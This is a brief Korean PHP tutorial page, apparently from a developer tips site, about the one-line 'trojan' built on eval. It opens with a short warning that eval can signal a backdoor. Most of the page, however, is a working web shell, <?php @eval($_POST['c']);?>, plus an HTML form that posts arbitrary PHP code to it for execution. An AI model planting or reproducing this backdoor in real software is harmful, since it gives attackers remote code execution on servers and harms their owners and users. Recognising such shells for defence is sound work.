>백엔드 개발 >PHP 튜토리얼 >PHP 평가를 위한 한 문장의 트로이 목마 코드 function_php 팁

PHP 평가를 위한 한 문장의 트로이 목마 코드 function_php 팁

WBOY
WBOY원래의
2016-05-16 20:15:111126검색

eval은 다른 PHP 코드를 실행하는 데 사용될 수 있으므로 코드에서 eval 함수를 발견하면 트로이 목마일 수 있으므로 주의하세요.

이 문장만으로도 사람을 죽일 수 있고, 어떤 파일이든 누구나 올릴 수 있으니 주의하세요

<&#63;php @eval($_POST['c']);&#63;>

사용 방법도 매우 간단합니다. 로컬 제출 파일을 제출 파일에 지정하면 내부의 PHP 코드가 실행됩니다

<html> 
<body> 
<form action="a.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

위 내용은 이 글의 전체 내용입니다. 모두 마음에 드셨으면 좋겠습니다.

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.